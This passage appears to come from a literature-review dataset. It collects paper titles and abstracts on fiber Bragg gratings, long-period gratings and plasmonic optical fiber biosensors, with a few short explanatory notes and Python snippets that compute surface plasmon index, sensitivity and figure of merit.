cladding-mode resonance among the spectral comb. This novel kind of plasmonic fiber grating sensor offers rapidity of production, design flexibility, and high temperature stability. --- paper_title: Cladding mode coupling in highly localized fiber Bragg gratings II: complete vectorial analysis paper_content: Highly localized fiber Bragg gratings can be inscribed point-by-point with focused ultrashort pulses. The transverse localization of the resonant grating causes strong coupling to cladding modes of high azimuthal and radial order. In this paper, we show how the reflected cladding modes can be fully analyzed, taking their vectorial nature, orientation and degeneracies into account. The observed modes’ polarization and intensity distributions are directly tied to the dispersive properties and show abrupt transitions in nature, strongly correlated with changes in the coupling strengths. --- paper_title: Off-axis ultraviolet-written fiber Bragg gratings for directional bending measurements. paper_content: Off-axis fiber Bragg gratings are inscribed by ultraviolet irradiation limited to expose only a portion of the fiber core cross section. The coupling to cladding modes is significantly increased, and the amplitude of the cladding mode resonances becomes sensitive to bending in magnitude and direction. Sensitivities ranging from +1.17 dB/m(-1) to -1.25 dB/m(-1) were obtained for bending in different directions relative to the offset direction of the grating, for curvatures from 0 to 1.1 m(-1), a range ideal for the shape sensing of large structures. The bending sensor response is also shown to be independent of temperature and the surrounding refractive index. 
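Several entries above (the gold-coated TFBGs and the eccentric femtosecond-written gratings) rely on phase-matching a cladding mode to a surface plasmon polariton at the metal coating. A minimal sketch of the flat-interface SPP effective index, which sets the refractive index region where that phase matching is possible, is given below; the gold permittivity value is an assumed illustrative number, since tabulated optical constants differ between datasets.

```python
import cmath

def spp_effective_index(eps_metal, n_dielectric):
    """Effective index of a surface plasmon polariton at a flat metal/dielectric
    interface: n_spp = sqrt(eps_m * eps_d / (eps_m + eps_d))."""
    eps_d = n_dielectric ** 2
    return cmath.sqrt(eps_metal * eps_d / (eps_metal + eps_d))

if __name__ == "__main__":
    # Illustrative gold permittivity near 1550 nm (values vary between datasets).
    n_spp = spp_effective_index(eps_metal=-115 + 11j, n_dielectric=1.333)
    # Re(n_spp) sits slightly above the water index, which is why cladding modes
    # near cut-off can phase-match to the SPP.
    print(f"Re(n_spp) = {n_spp.real:.4f}")
```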
--- paper_title: Ultrasensitive plasmonic sensing in air using optical fibre spectral combs paper_content: Fibre sensors are key to many minimally-invasive detection techniques but, owing to an index mismatch, they are often limited to aqueous environments. Here, Caucheteur et al. develop a high-resolution fibre gas sensor with a tilted in-fibre grating that allows coupling to higher-order plasmon modes. --- paper_title: Long-period fiber gratings as band-rejection filters paper_content: We present a new class of long-period fiber gratings that can be used as in-fiber, low-loss, band-rejection filters. Photoinduced periodic structures written in the core of standard communication-grade fibers couple light from the fundamental guided mode to forward propagating cladding modes and act as spectrally selective loss elements with low insertion losses, backreflections <-80 dB, polarization-mode dispersions <0.01 ps and polarization-dependent losses <0.02 dB. --- paper_title: Characterization of Long-period Grating Refractive Index Sensors and Their Applications paper_content: The influence of grating length and bend radius of long-period gratings (LPGs) on refractive index sensing was examined. Sensitivity to refractive indexes smaller than that of silica could be enhanced by bending LPGs. Bent LPGs lost sensitivity to refractive indexes higher than that of silica, whereas a 20-mm-long LPG arranged in a straight line had considerable sensitivity. These experimental results demonstrated that the sensitivity characteristics of LPGs to refractive index could be controlled by grating length and bend radius. --- paper_title: Long period fibre gratings for structural bend sensing paper_content: The authors examine the changes in wavelength and attenuation of long period fibre gratings subjected to bends with curvatures from 0 to 4.4 m⁻¹. The wavelength change with curvature is nonlinear, with a projected minimum detectable curvature change of 2 × 10⁻³ m⁻¹. The magnitude of the bend-induced wavelength shift depends on the rotation of the cylindrical fibre relative to the bending plane. --- paper_title: Measurements of refractive index sensitivity using long-period grating refractometer paper_content: Abstract We report the development and demonstration of a long-period grating refractometer. The principle of operation is based on the use of a long-period grating that is structurally induced by a CO2 laser, and where the resonance wavelengths are shifted as the refractive index of the medium surrounding the cladding of the long-period grating changes. The different concentrations of three types of solutions (ethylene glycol, salt, and sugar) were experimentally measured, and the results show that, as a refractometer, this fiber-based device not only can differentiate chemicals based on their refractive index, but it can also become a concentration indicator of a particular chemical solution, with application in the oil and petroleum industry. --- paper_title: Optical Fiber-Excited Surface Plasmon Resonance Spectroscopy of Single and Ensemble Gold Nanorods paper_content: Gold nanorods are deposited on the core surface of an etched optical fiber, and their surface plasmon resonance is excited by the evanescent wave from the optical fiber. The excitation of the surface plasmon produces strong light scattering from individual nanorods, allowing for single-particle scattering-based imaging and spectroscopy.
We systematically characterize the dependence of the scattering spectra of individual nanorods on the refractive index of the surrounding medium. As the refractive index is increased, the scattering spectra red shift steadily. The refractive index sensitivity and sensing figure of merit, which is the index sensitivity divided by the scattering peak line width, are found to reach 200 nm/RIU (RIU = refractive index unit) and 3.8, respectively. We further investigate the ensemble response of the plasmon resonance of Au nanorods to varying dielectric environments by measuring the intensity and spectrum of the light transmitted through the fiber. The ensemble index sensitivity ... --- paper_title: Tuning the Resonance of the Excessively Tilted LPFG-Assisted Surface Plasmon Polaritons: Optimum Design Rules for Ultrasensitive Refractometric Sensor paper_content: An excessively tilted LPFG-assisted surface plasmon polaritons sensor (Ex-TLPFG assisted SPP sensor) with ultrahigh sensitivity is proposed and numerically investigated using the finite-element-method-based full-vector complex coupled mode theory. We show that the SPP mode is transited (or excited) gradually from both the p-polarized TM $_{0,j}$ and EH $_{v,j}$ ( $v\geq 1$ ) modes, and hence, the proposed SPP sensor can be tuned to achieve strong resonance of either the degenerate TM $_{0,j}$ and EH $_{2,j}$ modes or EH $_{1,j}$ mode to optimize the sensitivity for analyte refractive index sensing. The results confirm that a transition point corresponding to the phase matching curve of the SPP mode is obtained, which can be used to predict the optimized grating period. By this approach, ultrasensitive SPP refractometric sensor can be obtained and the sensitivity can be further improved through a simple method: reducing the fiber cladding combined with an optimized grating period. We demonstrate that a giant sensitivity as high as $10100\,\text{nm}/\text{RIU}$ is achieved for the degenerate TM $_{0,32}$ and EH $_{2,32}$ modes (or $7400\,\text{nm/RIU}$ for the EH $_{1,32}$ mode). These appealing characteristics make the proposed Ex-TLPFG-assisted SPP sensor ideal for biochemical analyte sensing applications. --- paper_title: Lab on Fiber Technology for biological sensing applications paper_content: This review presents an overview of “Lab on Fiber” technologies and devices with special focus on the design and development of advanced fiber optic nanoprobes for biological applications. Depending on the specific location where functional materials at micro and nanoscale are integrated, “Lab on Fiber Technology” is classified into three main paradigms: Lab on Tip (where functional materials are integrated onto the optical fiber tip), Lab around Fiber (where functional materials are integrated on the outer surface of optical fibers), and Lab in Fiber (where functional materials are integrated within the holey structure of specialty optical fibers). ::: ::: This work reviews the strategies, the main achievements and related devices developed in the “Lab on Fiber” roadmap, discussing perspectives and challenges that lie ahead, with special focus on biological sensing applications. --- paper_title: Wavelength-based localized surface plasmon resonance optical fiber biosensor paper_content: Abstract Two types of localized surface plasmon resonance (LSPR)-based optical fiber biosensors using gold nanospheres (GNSs) and gold nanorods (GNRs) have been developed and their performance characteristics evaluated and cross-compared successfully in this work. 
Based on the results obtained from the optimization of each of these types of biosensor and reported by the authors elsewhere, GNSs with a diameter of 60 nm and GNRs with an aspect ratio of 4.1 were specifically chosen in this work for the fabrication of two representative sensor probes, with the aim of creating a highly sensitive, wavelength-based LSPR sensor to overcome the limitations arising from other intensity-based sensors. In order to develop effective LSPR biosensors, GNSs and GNRs were each immobilized on an unclad surface of an optical fiber, prior to functionalization with human IgG in order to create a device for the detection of anti-human IgG at different concentrations. The experimental results obtained from the tests carried out show that the sensitivities of the GNS- and GNR-based LSPR sensors to refractive index variation are 914 and 601 nm/RIU respectively; however, as biosensors they have demonstrated the same detection limit of 1.6 nM for the detection of anti-human IgG. --- paper_title: Colloidal gold-modified optical fiber for chemical and biochemical sensing. paper_content: A novel class of fiber-optic evanescent-wave sensor was constructed on the basis of modification of the unclad portion of an optical fiber with self-assembled gold colloids. The optical properties and, hence, the attenuated total reflection spectrum of self-assembled gold colloids on the optical fiber change with the refractive index of the environment near the colloidal gold surface. With sucrose solutions of increasing refractive index, the sensor response decreases linearly. The colloidal gold surface was also functionalized with glycine, succinic acid, or biotin to enhance the selectivity of the sensor. Results show that the sensor response decreases linearly with increasing concentration of each analyte. When the colloidal gold surface was functionalized with biotin, the detection limit of the sensor for streptavidin was 9.8 × 10⁻¹¹ M. Using this approach, we demonstrate proof-of-concept of a class of refractive index sensor that is sensitive to the refractive index of the environment near the colloidal gold surface and, hence, is suitable for label-free detection of molecular or biomolecular binding at the surface of gold colloids. --- paper_title: Universal scaling of the figure of merit of plasmonic sensors paper_content: We demonstrate an improvement by more than 1 order of magnitude of the figure of merit (FoM) of plasmonic nanoparticle sensors by means of the diffractive coupling of localized surface plasmon resonances. The coupling in arrays of nanoparticles leads to Fano resonances with narrow line widths known as surface lattice resonances, which are very suitable for the sensitive detection of small changes in the refractive index of the surroundings. We focus on the sensitivity to the bulk refractive index and find that the sensor FoM scales solely with the frequency difference between the surface lattice resonance and the diffracted order grazing to the surface of the array. This result, which can be extended to other systems with coupled resonances, enables the design of plasmonic sensors with a high FoM over broad spectral ranges with unprecedented accuracy.
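As a concrete illustration of the quantities quoted throughout these entries, the short Python sketch below estimates a bulk refractive-index sensitivity (nm/RIU) by a linear fit of resonance wavelength against surrounding index, and then forms the figure of merit defined in the nanorod entry above as the sensitivity divided by the resonance linewidth. The calibration points and the linewidth are illustrative assumptions, not data taken from the cited papers.

```python
# Minimal sketch: bulk sensitivity and figure of merit from a wavelength calibration.
import numpy as np

n_bulk = np.array([1.333, 1.343, 1.353, 1.363])    # surrounding refractive index
lam_peak = np.array([725.0, 727.1, 729.0, 731.1])  # measured resonance wavelength (nm), assumed

sensitivity, _ = np.polyfit(n_bulk, lam_peak, 1)   # slope of the linear fit, in nm per RIU
fwhm_nm = 55.0                                     # resonance linewidth (nm), assumed
fom = sensitivity / fwhm_nm                        # figure of merit, in RIU^-1

print(f"sensitivity ≈ {sensitivity:.0f} nm/RIU, FoM ≈ {fom:.2f} RIU^-1")
```

With these assumed numbers the fit returns roughly 200 nm/RIU and a FoM near 3.7, the same order of magnitude as the values quoted above.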
--- paper_title: Towards a Uniform Metrological Assessment of Grating-Based Optical Fiber Sensors: From Refractometers to Biosensors paper_content: A metrological assessment of grating-based optical fiber sensors is proposed with the aim of providing an objective evaluation of the performance of this sensor category. Attention was focused on the most common parameters, used to describe the performance of both optical refractometers and biosensors, which encompassed sensitivity, with a distinction between volume or bulk sensitivity and surface sensitivity, resolution, response time, limit of detection, specificity (or selectivity), reusability (or regenerability) and some other parameters of generic interest, such as measurement uncertainty, accuracy, precision, stability, drift, repeatability and reproducibility. Clearly, the concepts discussed here can also be applied to any resonance-based sensor, thus providing the basis for an easier and direct performance comparison of a great number of sensors published in the literature up to now. In addition, common mistakes present in the literature made for the evaluation of sensor performance are highlighted, and lastly a uniform performance assessment is discussed and provided. Finally, some design strategies will be proposed to develop a grating-based optical fiber sensing scheme with improved performance. --- paper_title: An enhanced LSPR fiber-optic nanoprobe for ultrasensitive detection of protein biomarkers. paper_content: A miniaturized, localized surface plasmon resonance (LSPR)-coupled fiber-optic (FO) nanoprobe is reported as a biosensor that is capable of label-free, sensitive detection of a cancer protein biomarker, free prostate specific antigen (f-PSA). The biosensor is based on the LSPR at the reusable dielectric-metallic hybrid interface with a robust, gold nano-disk array at the fiber end facet that is directly fabricated using EBL and metal lift-off process. The f-PSA has been detected with a mouse anti-human PSA monoclonal antibody (mAb) as a specific receptor linked with a self-assembled monolayer at the LSPR-FO facet surfaces. Experimental investigation and data analysis found near field refractive index (RI) sensitivity at ~226 nm/RIU with current LSPR-FO nanoprobe, and demonstrated the lowest limit of detection (LOD) at 100 fg/mL (~3 fM) of f-PSA in PBS solutions. The control experimentation using 5mg/mL bovine serum albumin in PBS and nonspecific surface test shows the excellent specificity and selectivity in the detection of f-PSA in PBS. These results present important progress towards a miniaturized, multifunctional fiber-optic technology that integrates informational communication and sensing function for developing a high performance, label-free, point-of-care (POC) device. --- paper_title: Annealing of gold nanostructures sputtered on glass substrate paper_content: The effects of annealing at 300 °C on gold nanostructures sputtered onto glass substrate were studied using XRD, SAXSees, the Van der Pauw method and ellipsometry. As-sputtered and annealed samples exhibit a different dependence of the gold lattice parameter on the sputtering time. With increasing sputtering time the average thickness of the layer and the size of gold crystallites increased. Another rapid enlargement of the crystallites is observed after annealing. The volume resistivity decreases rapidly with the increasing sputtering time for both, as-deposited and annealed structures. 
With increasing sputtering time initially discontinuous gold coverage changes gradually in a continuous one. Electrically continuous gold coverage on the as-sputtered and annealed samples exhibits the same concentration of free charge carriers and Hall mobility. Optical constants of as-deposited and annealed gold films determined by ellipsometry support resistivity measurements and clearly manifest the presence of plasmons in discontinuous films. --- paper_title: Bioinspired fabrication of optical fiber SPR sensors for immunoassays using polydopamine-accelerated electroless plating paper_content: This study presents a facile, rapid and effective method for the fabrication of optical fiber surface plasmon resonance (SPR) sensors via polydopamine (PDA)-accelerated electroless plating (ELP). The bioinspired PDA coating formed through the facile self-polymerization of dopamine (DA) was utilized as a versatile material for optic-fiber functionalization. Gold seeds were then rapidly and firmly adsorbed onto the PDA functional layer by amino and imino intermediates generated during the polymerization, and a gold film sensor was fabricated after metal deposition. The fabrication time of the sensor was decreased by 6–12 times, and the fabricated sensor exhibited higher sensitivity, better reproducibility and adhesion stability compared with those fabricated by the traditional ELP. Some key experimental parameters, including DA polymerization temperature, DA polymerization time, and plating time, were investigated in detail. The optimized sample exhibited high sensitivity ranging from 1391 nm per RIU to 5346 nm per RIU in the refractive index range of 1.328 to 1.386. Scanning electron microscopy images indicated that the sensor surface consisted of gold nanoparticles with a uniform particle size and an orderly arrangement, and the film thickness was approximately 60 nm. Another PDA layer was formed on the gold film for facile immobilization of antibodies. The sensor exhibited effective antibody immobilization ability and high sensitivity for human IgG detection over a wide range of concentrations from 0.5 to 40 μg mL−1, which indicate the potential applications of the fabricated sensor in immunoassays. --- paper_title: Thermal annealing of gold coated fiber optic surfaces for improved plasmonic biosensing paper_content: Abstract The morphological properties of thin gold (Au) films sputtered onto fiber optic (FO) substrates play an essential role in the overall performance of the sensing devices relying on surface plasmon resonance (SPR) effects. In this work, the influence of thermal treatments on the structural changes of the Au layer coated on the FO-SPR sensors, and consequently on their plasmonic biosensing performance, was systematically investigated. First, the sensors were exposed to different annealing temperatures for different durations and their sensitivity was evaluated by refractometric measurements in sucrose dilutions. The attained results suggested the optimal annealing conditions that were further validated using a split-plot experimental design statistical model. Room-temperature scanning tunneling microscopy (STM) imaging of the FO substrates revealed changes in the granular surface texture of the thermally treated Au films that could be linked to the observed increase in sensitivity of the treated sensors. The FO sensors, annealed under optimal conditions, were finally tested as label-free aptamer-based biosensors for the detection of Ara h 1 peanut allergen. 
Remarkably, the results demonstrated a superior biosensing performance of the thermally treated FO sensors, as the limit of detection (LOD) was improved with up to two orders of magnitude compared to a similar non-annealed FO-SPR sensor. This significant increase in sensitivity represents a major step forward in the facile and cost-effective preparation of FO-SPR sensors capable of label-free detection of various biomolecular targets. --- paper_title: Ion beam-induced enhanced adhesion of gold films deposited on glass paper_content: Abstract The metallisation of glass for decorative and/or functional purposes is now a well-established technique. The most popular methods are electroplating or sputter deposition. In order to obtain suitable adhesion, substrate pretreatment is a substantial part of a vapour-deposited coating that generally cannot be dispensed with. The pretreatment costs can reach the same order of magnitude as those associated with the actual coating process, or can even exceed them. In this work we studied the adhesion of Au thin films on glass. The substrates were pretreated by an ion-beam-mixing step, consisting of the deposition of Au/C bilayers or C/Au/C multilayers followed by Xe + implantation. After such preparation, the specimens were further coated (using a sputtering machine) with 150-nm-thick Au or Au-alloy films. Adhesion properties of the films were examined using a scratch tester in conjunction with scanning electron microscopy. It was observed that, without the ion-beam-mixing pretreatment, the coatings were poorly adherent. Strong adhesion enhancement was observed in the pretreated samples. The key mechanism envisaged to explain this is related to the formation of mixed SiC–Au phases at the interface region. Moreover, the mechanical properties of the pure and alloyed Au films were quantified by nano-indentation, and hardness results are in good agreement with a simple rigid-sphere model of substitutional hardening. --- paper_title: Silanization of solid surfaces via mercaptopropylsilatrane: a new approach of constructing gold colloid monolayers paper_content: Mercaptopropylsilatrane (MPS) was investigated as a novel self-assembled film on silica surfaces and also as a novel adhesive layer for the construction of a gold colloid monolayer on silica surfaces. We compare the preparation procedure and film quality of the MPS films to those of (3-mercaptopropyl)trimethoxysilane (MPTMS), which is commonly used for anchoring of gold nanoparticles on silica surfaces. The films were characterized by Fourier transform infrared spectroscopy, contact angle measurements, X-ray photoelectron spectroscopy, atomic force microscopy, and Ellman's reagent to determine surface mercaptan concentration. The process in preparing the MPS films involves more environmentally friendly aqueous or polar organic solvents, takes significantly shorter time (<30 min), and results in more uniform and reproducible films due to its insensitivity to moisture. The MPS films also have higher mercaptan surface density than that of the MPTMS films, resulting in higher saturation coverage of the gold colloid monolayers on the MPS-coated substrates. The higher ambient stability of the MPS films as compared to the MPTMS films is important for applications where sufficient durability of the self-assembled films under ambient conditions is required. 
Thus, mercaptosilatrane may have the potential to replace mercaptosilane for surface modification and as an adhesive layer for the construction of a noble metal colloid monolayer on oxide surfaces. --- paper_title: Oxides and nitrides as alternative plasmonic materials in the optical range [Invited] paper_content: As alternatives to conventional metals, new plasmonic materials offer many advantages in the rapidly growing fields of plasmonics and metamaterials. These advantages include low intrinsic loss, semiconductor-based design, compatibility with standard nanofabrication processes, tunability, and others. Transparent conducting oxides such as Al:ZnO, Ga:ZnO and indium-tin-oxide (ITO) enable many high-performance metamaterial devices operating in the near-IR. Transition-metal nitrides such as TiN or ZrN can be substitutes for conventional metals in the visible frequencies. In this paper we provide the details of fabrication and characterization of these new materials and discuss their suitability for a number of metamaterial and plasmonic applications. --- paper_title: Improved detection limits of protein optical fiber biosensors coated with gold nanoparticles. paper_content: The study presented herein investigates a novel arrangement of fiber-optic biosensors based on a tilted fiber Bragg grating (TFBG) coated with noble metal nanoparticles, either gold nanocages (AuNC) or gold nanospheres (AuNS). The biosensors constructed for this study demonstrated increased specificity and lowered detection limits for the target protein than a reference sensor without gold nanoparticles. The sensing film was fabricated by a series of thin-film and monolayer depositions to attach the gold nanoparticles to the surface of the TFBG using only covalent bonds. Though the gold nanoparticle integration had not yet been optimized for the most efficient coverage with minimum number of nanoparticles, binding AuNS and AuNC to the TFBG biosensor decreased the minimum detected target concentrations from 90 nM for the reference sensor, to 11 pM and 8 pM respectively. This improvement of minimum detection is the result of a reduced non-specific absorption onto the gold nanoparticles (by functionalization of the external surface of the gold nanoparticles), and of an optical field enhancement due to coupling between the photonic modes of the optical fiber and the localized surface plasmon resonances (LSPR) of the gold nanoparticles. This coupling also increased the sensitivity of the TFBG biosensor to changes in its local environment. The dissociation constant (Kd) of the target protein was also characterized with our sensing platform and found to be in good agreement with that of previous studies. --- paper_title: High resolution fiber optic surface plasmon resonance sensors with single-sided gold coatings paper_content: The surface plasmon resonance (SPR) performance of gold coated tilted fiber Bragg gratings (TFBG) at near infrared wavelengths is evaluated as a function of the angle between the tilt plane orientation and the direction of single- and double-sided, nominally 50 nm-thick gold metal depositions. Scanning electron microscope images show that the coating are highly non-uniform around the fiber circumference, varying between near zero and 50 nm. 
In spite of these variations, the experimental results show that the spectral signature of the TFBG-SPR sensors is similar to that of simulations based on perfectly uniform coatings, provided that the depositions are suitably oriented along the tilt plane direction. Furthermore, it is shown that even a (properly oriented) single-sided coating (over only half of the fiber circumference) is sufficient to provide a theoretically perfect SPR response with a bandwidth under 5 nm, and 90% attenuation. Finally, using a pair of adjacent TFBG resonances within the SPR response envelope, a power detection scheme is used to demonstrate a limit of detection of 3 × 10−6 refractive index units. --- paper_title: Identification and Quantification of Celery Allergens Using Fiber Optic Surface Plasmon Resonance PCR paper_content: Abstract: Accurate identification and quantification of allergens is key in healthcare, biotechnology and food quality and safety. Celery (Apium graveolens) is one of the most important elicitors of food allergic reactions in Europe. Currently, the golden standards to identify, quantify and discriminate celery in a biological sample are immunoassays and two-step molecular detection assays in which quantitative PCR (qPCR) is followed by a high-resolution melting analysis (HRM). In order to provide a DNA-based, rapid and simple detection method suitable for one-step quantification, a fiber optic PCR melting assay (FO-PCR-MA) was developed to determine different concentrations of celery DNA (1 pM–0.1 fM). The presented method is based on the hybridization and melting of DNA-coated gold nanoparticles to the FO sensor surface in the presence of the target gene (mannitol dehydrogenase, Mtd). The concept was not only able to reveal the presence of celery DNA, but also allowed for the cycle-to-cycle quantification of the target sequence through melting analysis. Furthermore, the developed bioassay was benchmarked against qPCR followed by HRM, showing excellent agreement (R2 = 0.96). In conclusion, this innovative and sensitive diagnostic test could further improve food quality control and thus have a large impact on allergen induced healthcare problems. --- paper_title: Enhanced Biosensor Platforms for Detecting the Atherosclerotic Biomarker VCAM1 Based on Bioconjugation with Uniformly Oriented VCAM1-Targeting Nanobodies paper_content: Surface bioconjugation of biomolecules has gained enormous attention for developing advanced biomaterials including biosensors. While conventional immobilization (by physisorption or covalent couplings using the functional groups of the endogenous amino acids) usually results in surfaces with low activity, reproducibility and reusability, the application of methods that allow for a covalent and uniformly oriented coupling can circumvent these limitations. In this study, the nanobody targeting Vascular Cell Adhesion Molecule-1 (NbVCAM1), an atherosclerotic biomarker, is engineered with a C-terminal alkyne function via Expressed Protein Ligation (EPL). Conjugation of this nanobody to azidified silicon wafers and Biacore™ C1 sensor chips is achieved via Copper(I)-catalyzed azide-alkyne cycloaddition (CuAAC) "click" chemistry to detect VCAM1 binding via ellipsometry and surface plasmon resonance (SPR), respectively. The resulting surfaces, covered with uniformly oriented nanobodies, clearly show an increased antigen binding affinity, sensitivity, detection limit, quantitation limit and reusability as compared to surfaces prepared by random conjugation. 
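The single-sided-coating TFBG entry above mentions a power-detection scheme based on a pair of adjacent cladding resonances inside the SPR envelope. One plausible way to realise such a readout, sketched below under purely illustrative assumptions (a toy spectrum and an assumed index dependence, not the cited paper's exact scheme), is to normalise the band power around the SPR-sensitive resonance by the band power around a neighbouring, largely insensitive resonance, so that source-power drift cancels in the ratio.

```python
# Hypothetical sketch of a two-resonance (ratiometric) power readout.
import numpy as np

wl = np.linspace(1540.0, 1555.0, 3001)             # wavelength grid (nm)

def transmission(sri):
    """Toy transmission spectrum: two narrow dips, only the first follows the SRI."""
    depth_sensing = 0.60 - 300.0 * (sri - 1.3330)  # assumed dependence on surrounding index
    dip_sensing = depth_sensing * np.exp(-((wl - 1547.0) / 0.10) ** 2)
    dip_reference = 0.50 * np.exp(-((wl - 1551.0) / 0.10) ** 2)
    return 1.0 - dip_sensing - dip_reference

def band_mean(t, lo, hi):
    """Mean transmission within the narrow band [lo, hi] (nm)."""
    sel = (wl >= lo) & (wl <= hi)
    return t[sel].mean()

for sri in (1.3330, 1.3340, 1.3350):
    t = transmission(sri)
    ratio = band_mean(t, 1546.5, 1547.5) / band_mean(t, 1550.5, 1551.5)
    print(f"SRI = {sri:.4f}  ->  band power ratio = {ratio:.4f}")
```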
These findings demonstrate the added value of a combined EPL and CuAAC approach as it results in strong control over the surface orientation of the nanobodies and an improved detecting power of their targets-a must for the development of advanced miniaturized, multi-biomarker biosensor platforms. --- paper_title: Self-assembled Monolayers for Biosensors paper_content: The use of self-assembled monolayers (SAMs) in various fields of ::: research is rapidly growing. In particular, many biomedical fields apply ::: SAMs as an interface-layer between a metal surface and a solution or ::: vapour. This review summarises methods for the formation of SAMs upon the ::: most commonly used materials and techniques used for monolayer ::: characterisation. Emphasis will lie on uniform, mixed and functionalised ::: monolayers applied for immobilisation of biological components including ::: (oligo-)nucleotides, proteins, antibodies and receptors as well as ::: polymers. The application of SAMs in today’s research, together with ::: some applications will be discussed. --- paper_title: Optical biosensors for food quality and safety assurance—a review paper_content: Food quality and safety is a scientific discipline describing handling, preparation and storage of food in ways that prevent food borne illness. Food serves as a growth medium for microorganisms that can be pathogenic or cause food spoilage. Therefore, it is imperative to have stringent laws and standards for the preparation, packaging and transportation of food. The conventional methods for detection of food contamination based on culturing, colony counting, chromatography and immunoassay are tedious and time consuming while biosensors have overcome some of these disadvantages. There is growing interest in biosensors due to high specificity, convenience and quick response. Optical biosensors show greater potential for the detection of pathogens, pesticide and drug residues, hygiene monitoring, heavy metals and other toxic substances in the food to check whether it is safe for consumption or not. This review focuses on optical biosensors, the recent developments in the associated instrumentation with emphasis on fiber optic and surface plasmon resonance (SPR) based biosensors for detecting a range of analytes in food samples, the major advantages and challenges associated with optical biosensors. It also briefly covers the different methods employed for the immobilization of bio-molecules used in developing biosensors. --- paper_title: Free-Energy-Driven Lock/Open Assembly-Based Optical DNA Sensor for Cancer-Related microRNA Detection with a Shortened Time-to-Result paper_content: Quantification of cancer biomarker microRNAs (miRs) by exquisitely designed biosensors with a short time-to-result is of great clinical significance. With immobilized capture probes (CPs) and fluorescent-labeled signal probes (SPs), surface-involved sandwich-type (SST) biosensors serve as powerful tools for rapid, highly sensitive, and selective detection of miR in complex matrices as opposed to the conventional techniques. One key challenge for such SST biosensors is the existence of false-negative signals when the amount of miRs exceeds SPs in solution phase for a surface with a limited number of CP. To meet this challenge, a dynamic lock/open DNA assembly was designed to rationally program the pathway for miR/SP hybrids. 
Based on secondary structure analysis and free-energy assessment, a “locker” strand that partially hybridizes with target miR by two separated short arms was designed to stabilize target miR, preventing possible false-negative signals. The strategy was demonstrated on a fiber-based flu... --- paper_title: Facile screening of potential xenoestrogens by an estrogen receptor-based reusable optical biosensor. paper_content: The apparent increase in hormone-induced cancers and disorders of the reproductive tract has led to a growing demand for new technologies capable of screening xenoestrogens. We reported an estrogen receptor (ER)-based reusable fiber biosensor for facile screening estrogenic compounds in environment. The bioassay is based on the competition of xenoestrogens with 17β-estradiol (E2) for binding to the recombinant receptor of human estrogen receptor α (hERα) protein, leaving E2 free to bind to fluorophore-labeled anti-E2 monoclonal antibody. Unbound anti-E2 antibody then binds to the immobilized E2-protein conjugate on the fiber surface, and is detected by fluorescence emission induced by evanescent field. As expected, the stronger estrogenic activity of xenoestrogen would result in the weaker fluorescent signal. Three estrogen-agonist compounds, diethylstilbestrol (DES), 4-n-nonylphenol (NP) and 4-n-octylphenol (OP), were chosen as a paradigm for validation of this assay. The rank order of estrogenic potency determined by this biosensor was DES>OP>NP, which were consistent with the published results in numerous studies. Moreover, the E2-protein conjugate modified optical fiber was robust enough for over 300 sensing cycles with the signal recoveries ranging from 90% to 100%. In conclusion, the biosensor is reusable, reliable, portable and amenable to on-line operation, providing a facile, efficient and economical alternative to screen potential xenoestrogens in environment. --- paper_title: Non-antibody protein-based biosensors paper_content: Biosensors that depend on a physical or chemical measurement can be adversely affected by non-specific interactions. For example, a biosensor designed to measure specifically the levels of a rare analyte can give false positive results if there is even a small amount of interaction with a highly abundant but irrelevant molecule. To overcome this limitation, the biosensor community has frequently turned to antibody molecules as recognition elements because they are renowned for their exquisite specificity. Unfortunately antibodies can often fail when immobilised on inorganic surfaces, and alternative biological recognition elements are needed. This article reviews the available non-antibody-binding proteins that have been successfully used in electrical and micro-mechanical biosensor platforms. --- paper_title: Plasmonic Fiber Optic Refractometric Sensors: From Conventional Architectures to Recent Design Trends paper_content: Surface Plasmon Resonance (SPR) fiber sensor research has grown since the first demonstration over 20 year ago into a rich and diverse field with a wide range of optical fiber architectures, plasmonic coatings, and excitation and interrogation methods. Yet, the large diversity of SPR fiber sensor designs has made it difficult to understand the advantages of each approach. Here, we review SPR fiber sensor architectures, covering the latest developments from optical fiber geometries to plasmonic coatings. 
By developing a systematic approach to fiber-based SPR designs, we identify and discuss future research opportunities based on a performance comparison of the different approaches for sensing applications. --- paper_title: Small biomolecule immunosensing with plasmonic optical fiber grating sensor. paper_content: This study reports on the development of a surface plasmon resonance (SPR) optical fiber biosensor based on tilted fiber Bragg grating technology for direct detection of small biomarkers of interest for lung cancer diagnosis. Since SPR principle relies on the refractive index modifications to sensitively detect mass changes at the gold coated surface, we have proposed here a comparative study in relation to the target size. Two cytokeratin 7 (CK7) samples with a molecular weight ranging from 78 kDa to 2.6 kDa, respectively CK7 full protein and CK7 peptide, have been used for label-free monitoring. This work has first consisted in the elaboration and the characterization of a robust and reproducible bioreceptor, based on antibody/antigen cross-linking. Immobilized antibodies were then utilized as binding agents to investigate the sensitivity of the biosensor towards the two CK7 antigens. Results have highlighted a very good sensitivity of the biosensor response for both samples diluted in phosphate buffer with a higher limit of detection for the larger CK7 full protein. The most groundbreaking nature of this study relies on the detection of small biomolecule CK7 peptides in buffer and in the presence of complex media such as serum, achieving a limit of detection of 0.4 nM. --- paper_title: Polarized spectral combs probe optical fiber surface plasmons. paper_content: The high-order cladding modes of conventional single mode fiber come in semi-degenerate pairs corresponding to mostly radially or mostly azimuthally polarized light. Using tilted fiber Bragg gratings to excite these mode families separately, we show how plasmonic coupling to a thin gold coating on the surface of the fiber modifies the effective indices of the modes differently according to polarization and to mode order. In particular, we show the existence of a single “apolarized” grating resonance, with equal effective index for all input polarization states. This special resonance provides direct evidence of the excitation of a surface plasmon on the metal surface but also an absolute wavelength reference that allows for the precise localization of the most sensitive resonances in refractometric and biochemical sensing applications. Two plasmon interrogation methods are proposed, based on wavelength and amplitude measurements. Finally, we use a biotin-streptavidin biomolecular recognition experiment to demonstrate that differential spectral transmission measurements of a fine comb of cladding mode resonances in the vicinity of the apolarized resonance provide the most accurate method to extract information from plasmon-assisted Tilted fiber Bragg gratings, down to pM concentrations and at least 10−5 refractive index changes. --- paper_title: Surface plasmon resonance sensor interrogation with a double-clad fiber coupler and cladding modes excited by a tilted fiber Bragg grating. paper_content: We present a novel optical fiber surface plasmon resonance (SPR) sensor scheme using reflected guided cladding modes captured by a double-clad fiber coupler and excited in a gold-coated fiber with a tilted Bragg grating. 
